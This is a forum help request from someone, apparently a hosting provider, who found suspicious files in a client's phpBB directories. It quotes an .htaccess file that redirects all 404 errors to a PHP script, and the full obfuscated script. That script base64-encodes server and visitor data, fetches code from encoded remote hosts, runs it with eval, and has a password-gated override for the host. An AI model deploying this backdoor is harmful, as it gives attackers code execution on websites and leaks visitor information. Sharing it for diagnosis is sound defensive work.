nzkiwi
Perch
I have a client who has installed phpBB, I assume from the CGI-Wizard in the Control Panel as most files have ownership of [username]:mblogistica instead of the more usual [username}:[username].
My concern is that there have appeared in directories with access permissions of 777 a .htaccess file and .php file that are dated about a month after phpBB was activated. Each php file has a different name, but consists of a series of digits - for example 223987,php. The .htaccess file refers to the php file. As both the .htaccess file and the php file have an ownership of httpd:httpd, I'm guessing the client is a hacking victim.
Example .htaccess file:
The 223987.php file:
Can anyone shed any light on these files?
My concern is that there have appeared in directories with access permissions of 777 a .htaccess file and .php file that are dated about a month after phpBB was activated. Each php file has a different name, but consists of a series of digits - for example 223987,php. The .htaccess file refers to the php file. As both the .htaccess file and the php file have an ownership of httpd:httpd, I'm guessing the client is a hacking victim.
Example .htaccess file:
Code:
<Files *>
Order Allow,Deny
Deny from All
</Files>
Options -MultiViews
ErrorDocument 404 //forums/cache/223987.php
Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6d2beb2e8c4b32759e39c3e909cb6dbf") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>